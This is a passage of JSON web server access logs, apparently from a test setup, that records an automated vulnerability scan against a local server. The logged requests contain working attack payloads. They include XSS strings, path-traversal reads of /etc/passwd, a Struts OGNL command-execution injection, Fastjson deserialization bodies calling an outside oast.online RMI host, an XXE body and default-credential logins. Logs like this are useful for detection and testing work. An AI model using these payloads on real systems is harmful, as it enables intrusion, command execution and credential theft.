NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alfresco/api/-default-/public/cmis/versions/1.1/atom HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxcum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /IntellectMain.jsp?IntellectSystem=https://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22LL\x5Cu0063\x5Cu006f\x5Cu006d.sun.rowset.JdbcRowSetImpl;;\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8gc8smpv8b0ng0t001whf3jfnuqs1m.oast.online/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"action=login&u=admin&p=admin256","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service.web HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_inf.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wptouch_switch=desktop&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8gc8smpv8b0ng0t0031d9pm546ytwo.oast.online/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gsearch.php.en?prod=';prompt`document.domain`;// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webclient/Login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ucmdb-api/connect HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_pvt/service.cnf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/ftu/welcome.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /panel HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sysmgmt/2015/bmc/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aplicacao/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/deployment.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img.php?f=/./etc/./passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /druid/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/_catalog HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 